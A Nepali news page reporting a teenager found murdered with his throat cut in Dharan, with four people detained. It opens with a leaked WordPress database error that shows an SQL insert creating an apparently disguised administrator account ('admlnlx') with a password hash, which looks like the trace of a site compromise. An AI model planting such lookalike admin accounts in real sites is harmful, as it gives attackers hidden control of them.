WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLEMjbySg79MiQgPtFSm3akkB1GBBC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 09:17:23', '', 'admlnlx', 'admlnlx')
सुनसरी,पुस ९-
घाँटी रेटेर विभत्स हत्या गरिएको अवस्थामा धरानमा एक युवाको शव भेटिएको छ। इलाका प्रहरी कार्यलय धरानका डिएसपी ढकेन्द्र खतिवडाका अनुसार धरान १५ चुम्लुङ भवन नजिक अन्दाजी १८ वर्षका युवकको शव फेला परेको हो। हत्या आशंकामा प्रहरीले चारजनालाई नियन्त्रणमा लिएको छ। मृतकको सनाखत हुन बाँकी छ।
घाँटी रेटेर ढुंगा प्रहार गरेको अवस्थामा शव भेटिएको हो। हत्या शनिबार विहान ४ देखि ५ बजेको बिचमा भएको प्रहरीको अनुमान छ। शव पोस्टमार्टममको लागि धरानस्थित बीपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठानमा राखिएको छ।